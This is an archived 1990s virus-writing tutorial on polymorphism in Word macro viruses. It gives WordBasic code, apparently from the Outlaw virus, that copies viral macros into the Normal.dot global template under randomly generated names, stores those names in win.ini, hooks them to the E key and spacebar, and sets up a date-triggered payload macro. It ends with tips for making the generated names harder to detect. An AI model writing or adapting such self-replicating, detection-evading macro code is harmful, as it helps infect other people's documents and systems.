HPAVC

home *** CD-ROM | disk | FTP | other *** search

/ HPAVC / HPAVC CD-ROM.iso / CCTX0297.ZIP / TUTUPDT8.ZIP / NEOWMTUT.ZIP / WMTUTPOL.TX1 < prev next >

Wrap

Text File | 1997-01-19 | 15KB | 410 lines

POLYMORPHISM IN MACRO VIRII You maybe already heared something about polymorphism in macro virii. The first macro virus that uses this technique was the Outlaw virus. The way it is polymorphic is that it changes it's macro names every infection and stores them (the macro names) in win.ini. If Word is restarted, it reads the names of the macro from win.ini. To use them in your macros you need to read them and set them into strings like name1$, name2$, etc. The names that are generated are just a charachter + number, something like A326 or maybe RT898763. The reason that it uses characters plus numbers is because Word can only use macros that begin with a character. After the character there can be numbers too. That's done because of the fact that numbers are easy to generate in Word. Just use some random function to generate a random number. But if Word generates a number there is always an open space before the number because that is used for making the number negative. i.e. if the generated number is "12345" it actually is " 12345". There is a function that deletes that open space. Its Ltrim. You will see how it works in the example. I hope you get it, and else don't worry but read the file again. And now , the moment you've all been waiting for :) the code for making a poly- morfic macro virus. This is an example of the code the Outlaw virus uses. ---------The Macro for creating random names--------------- Sub MAIN On Error Goto Done '<Error handler.> A$ = FileName$() '<A$ = active filename.> If A$ = "" Then Goto Finish '<If no file active goto finish.> If CheckInstalled = 0 Then '<Already installed?...> Routine '<No then goto Sub Routine, Crypt ' Sub Crypt, Sub PayLoadMakro, PayloadMakro ' etc.> FileSaveAll 1, 1 Else '<Yes (already installed).> Goto Done '<Goto done.> End If Done: '<Done (already installed).> A$ = FileName$() '<A$ = active filename.> If A$ = "" Then '<If no file active goto finish.> Goto Finish Else '<If a file is active, Insert " " ' insert a "space", for infecting ' the active file.> End If Finish: '<Finish (no file active).> End Sub Sub Crypt '<The Sub Crypt.> One = 7369 '<Number one is 7369.> Two = 9291 '<Number two is 9291.> Num = Int(Rnd() * (Two - One) + One) '<generate random number.> A$ = Str$(Num) '<A$ is generated number.> A$ = LTrim$(A$) '<Delete the empty space before... ' the number. The empty space is... ' for making the number negative, ' e.g. -7369.> Beginn = Hour(Now()) '<Beginn is the active hour.> B$ = Str$(Beginn) '<B$ is the active hour (string).> B$ = LTrim$(B$) '<Delete the empty space in B$.> If B$ = "1" Then C$ = "A" '<If B$ is 1 (1 o'clock)... ' then C$ is A.> If B$ = "2" Then C$ = "B" '<If B$ is 2 (2 o'clock)... ' then C$ is B.> If B$ = "3" Then C$ = "C" '<If B$ is 3 (3 o'clock)... ' then C$ is C.> If B$ = "4" Then C$ = "D" '<Etc.> If B$ = "5" Then C$ = "E" If B$ = "6" Then C$ = "F" If B$ = "7" Then C$ = "G" If B$ = "8" Then C$ = "H" If B$ = "9" Then C$ = "I" If B$ = "10" Then C$ = "J" If B$ = "11" Then C$ = "K" If B$ = "12" Then C$ = "L" If B$ = "13" Then C$ = "M" If B$ = "14" Then C$ = "N" If B$ = "15" Then C$ = "O" If B$ = "16" Then C$ = "P" If B$ = "17" Then C$ = "Q" If B$ = "18" Then C$ = "R" If B$ = "19" Then C$ = "S" If B$ = "20" Then C$ = "T" If B$ = "21" Then C$ = "U" If B$ = "22" Then C$ = "V" If B$ = "23" Then C$ = "W" If B$ = "00" Then C$ = "X" E$ = C$ + A$ '<E$ is C$ (character) plus... ' A$ (the generated number).> ZU$ = GetDocumentVar$("VirNameDoc") '<ZU$ is macro called VirNameDoc... ' Watch out:VirNameDoc is not... ' the real macro name, it's some... ' sort of string.> PG$ = WindowName$() + ":" + ZU$ '<PG$ is active filename plus... ' ":" and plus macro name (ZU$).> MacroCopy PG$, "Global:" + E$ '<Copies macro from document... ' to global template, with... 'the name that was generated.> SetProfileString "Intl", "Name2", E$ '<Set the macro name in... ' win.ini. as "Intl", "Name2", E$.> ToolsCustomizeKeyboard .KeyCode = 69, .Category = 2, .Name = E$, .Add, .Context = 0 '<Creates short-cut with the... ' ascii keycode 69 (E). If the... ' E key is pushed the macro... ' E$ will be executed (The above... ' macro). With the .Add you tell... ' Word that you want to add that... ' function to the key not replace... ' it.> End Sub '<End the Sub Crypt> Sub Routine '<Begin Sub Routine> One = 7369 '<This is practically... Two = 9291 ' the same as Sub Crypt.> Num = Int(Rnd() * (Two - One) + One) '<I will only explain the... A$ = Str$(Num) ' things that aren't... A$ = LTrim$(A$) ' explained above.> Beginn = Hour(Now()) B$ = Str$(Beginn) B$ = LTrim$(B$) If B$ = "1" Then C$ = "A" If B$ = "2" Then C$ = "B" If B$ = "3" Then C$ = "C" If B$ = "4" Then C$ = "D" If B$ = "5" Then C$ = "E" If B$ = "6" Then C$ = "F" If B$ = "7" Then C$ = "G" If B$ = "8" Then C$ = "H" If B$ = "9" Then C$ = "I" If B$ = "10" Then C$ = "J" If B$ = "11" Then C$ = "K" If B$ = "12" Then C$ = "L" If B$ = "13" Then C$ = "M" If B$ = "14" Then C$ = "N" If B$ = "15" Then C$ = "O" If B$ = "16" Then C$ = "P" If B$ = "17" Then C$ = "Q" If B$ = "18" Then C$ = "R" If B$ = "19" Then C$ = "S" If B$ = "20" Then C$ = "T" If B$ = "21" Then C$ = "U" If B$ = "22" Then C$ = "V" If B$ = "23" Then C$ = "W" If B$ = "00" Then C$ = "X" D$ = C$ + A$ '<The same as in Sub Crypt... UZ$ = GetDocumentVar$("VirName") ' only with other names.> GP$ = WindowName$() + ":" + UZ$ MacroCopy GP$, "Global:" + D$ SetProfileString "Intl", "Name", D$ ToolsCustomizeKeyboard .KeyCode = 32, .Category = 2, .Name = D$, .Add, .Context = 0 '<This one creates a short-cut... ' with the D$ macro (this macro)... ' if the spacebar (keycode 32)... ' is pushed.> End Sub Sub PayloadMakro '<Same again.> One = 7369 Two = 9291 Num = Int(Rnd() * (Two - One) + One) A$ = Str$(Num) A$ = LTrim$(A$) Beginn = Hour(Now()) B$ = Str$(Beginn) B$ = LTrim$(B$) If B$ = "1" Then C$ = "A" If B$ = "2" Then C$ = "B" If B$ = "3" Then C$ = "C" If B$ = "4" Then C$ = "D" If B$ = "5" Then C$ = "E" If B$ = "6" Then C$ = "F" If B$ = "7" Then C$ = "G" If B$ = "8" Then C$ = "H" If B$ = "9" Then C$ = "I" If B$ = "10" Then C$ = "J" If B$ = "11" Then C$ = "K" If B$ = "12" Then C$ = "L" If B$ = "13" Then C$ = "M" If B$ = "14" Then C$ = "N" If B$ = "15" Then C$ = "O" If B$ = "16" Then C$ = "P" If B$ = "17" Then C$ = "Q" If B$ = "18" Then C$ = "R" If B$ = "19" Then C$ = "S" If B$ = "20" Then C$ = "T" If B$ = "21" Then C$ = "U" If B$ = "22" Then C$ = "V" If B$ = "23" Then C$ = "W" If B$ = "00" Then C$ = "X" K$ = C$ + A$ '<Again another name.> ZUZ$ = GetDocumentVar$("VirNamePayload") GP$ = WindowName$() + ":" + ZUZ$ MacroCopy GP$, "Global:" + K$ SetProfileString "Intl", "Name3", K$ '<Only this time no... ' short-cut because this... ' is the payloadmacro and... ' this payload macro is only... ' executed on a special date... ' that is programmed in... ' another macro. For the... ' whole Outlaw virus, see... ' the virii section.> End Sub Function CheckInstalled '<A function to check if... ' the virus already installed... ' the global template (Normal.Dot).> CC$ = GetProfileString$("Intl", "Name") '<CC$ is the name of the Routine... ' macro (Sub Routine).> CheckInstalled = 0 '<Set the var checkinstalled to 0.> If CountMacros(0) > 0 Then '<If the number of macros in... ' Normal.Dot is greater then 0, For i = 1 To CountMacros(0) ' then create a for...next loop... ' that loops the number of macros.> If MacroName$(i, 0) = CC$ Then '<If the macro name in... CheckInstalled = 1 ' Normal.dot is CC$ (routine... ' macro) then set var... ' CheckInstalled to 1.> End If '<Ends the If instruction.> Next i '<All macros done? then... ' continue. Else go back to... ' for...next loop.> End If '<Ends the If instruction.> End Function '<The end of the function.> ---------------------------------------------------------------- You see this isn't as complicated as you may have thought. The only complicated thing is the saving of the macro names in the win.ini. About that, if you want to use the generated macro names in another macro, you must read the macro names from win.ini. This is done by typing: UZ$ = GetProfileString$("Intl", "Name") It's best to set this at the top of the macro. But if the virus contains more then two macros (Outlaw does) you must set another line in your macro. Just below the UZ$ = getprof... you type: ZU$ = GetProfileString$("Intl", "Name2") ZUZ$ = GetProfileString$("Intl", "Name3") Only, be awrare if you didn't use Intl and Name1, Name2, etc. you must change the names. But now UZ$, ZU$ and ZUZ$ contains the macro names. So you could use something like: infDoc$ = FileName() Macrocopy "Global:" + UZ$, InfDoc$ + ":" + generated name This is just simple polymorfism. What you can do to improve your poly- morfism is: - Making more generatable names - Make sure that a name doesn't come twice - Do not use the time to generate the first character Making more generatable names is quite easy, because you could just make the number higher. For example: Instead of using this: One = 7369 Two = 9291 Num = Int(Rnd() * (Two - One) + One) A$ = Str$(Num) A$ = LTrim$(A$) You could use this: One = 1000000 Two = 9999999 Num = Int(Rnd() * (Two - One) + One) A$ = Str$(Num) A$ = LTrim$(A$) Real simple, isn't it? Now the second thing. How to make sure that a generated name doesn't comes twice. You could use: One = 1000 Two = 2000 Num = Int(Rnd() * (Two - One) + One) A$ = Str$(Num) A$ = LTrim$(A$) And for the next macro: One = 2001 Two = 3000 Num = Int(Rnd() * (Two - One) + One) A$ = Str$(Num) A$ = LTrim$(A$) And so on... See? But instead of using the numbers you could also use the characters: You could use: Beginn = Hour(Now()) B$ = Str$(Beginn) B$ = LTrim$(B$) If B$ = "1" Then C$ = "AA" If B$ = "2" Then C$ = "BB" If B$ = "3" Then C$ = "CC" If B$ = "4" Then C$ = "DD" If B$ = "5" Then C$ = "EE" If B$ = "6" Then C$ = "FF" If B$ = "7" Then C$ = "GG" If B$ = "8" Then C$ = "HH" If B$ = "9" Then C$ = "II" If B$ = "10" Then C$ = "JJ" If B$ = "11" Then C$ = "KK" If B$ = "12" Then C$ = "LL" If B$ = "13" Then C$ = "MM" If B$ = "14" Then C$ = "NN" If B$ = "15" Then C$ = "OO" If B$ = "16" Then C$ = "PP" If B$ = "17" Then C$ = "QQ" If B$ = "18" Then C$ = "RR" If B$ = "19" Then C$ = "SS" If B$ = "20" Then C$ = "TT" If B$ = "21" Then C$ = "UU" If B$ = "22" Then C$ = "VV" If B$ = "23" Then C$ = "WW" If B$ = "00" Then C$ = "XX" And the next time: Beginn = Hour(Now()) B$ = Str$(Beginn) B$ = LTrim$(B$) If B$ = "1" Then C$ = "AB" If B$ = "2" Then C$ = "BC" If B$ = "3" Then C$ = "CD" If B$ = "4" Then C$ = "DE" If B$ = "5" Then C$ = "EF" If B$ = "6" Then C$ = "FG" If B$ = "7" Then C$ = "GH" If B$ = "8" Then C$ = "HI" If B$ = "9" Then C$ = "IJ" If B$ = "10" Then C$ = "JK" If B$ = "11" Then C$ = "KL" If B$ = "12" Then C$ = "LM" If B$ = "13" Then C$ = "MN" If B$ = "14" Then C$ = "NO" If B$ = "15" Then C$ = "OP" If B$ = "16" Then C$ = "PQ" If B$ = "17" Then C$ = "QR" If B$ = "18" Then C$ = "RS" If B$ = "19" Then C$ = "ST" If B$ = "20" Then C$ = "TU" If B$ = "21" Then C$ = "UV" If B$ = "22" Then C$ = "VW" If B$ = "23" Then C$ = "WX" If B$ = "00" Then C$ = "XY" So easy i'm falling asleap, tell me something i cannot think by myself! Ok, i'll try...and now how not to use the time for generating the first character. Instead of using: One = 7369 Two = 9291 Num = Int(Rnd() * (Two - One) + One) A$ = Str$(Num) A$ = LTrim$(A$) Beginn = Hour(Now()) B$ = Str$(Beginn) B$ = LTrim$(B$) use this: One = 7369 Two = 9291 Num = Int(Rnd() * (Two - One) + One) A$ = Str$(Num) A$ = LTrim$(A$) One = 0 Two = 23 Num = Int(Rnd() * (Two - One) + One) B$ = Str$(Num) B$ = LTrim$(B$) I said:"TELL ME SOMETHING I CANNOT THINK BY MYSELF!!!"... --- Neophyte ---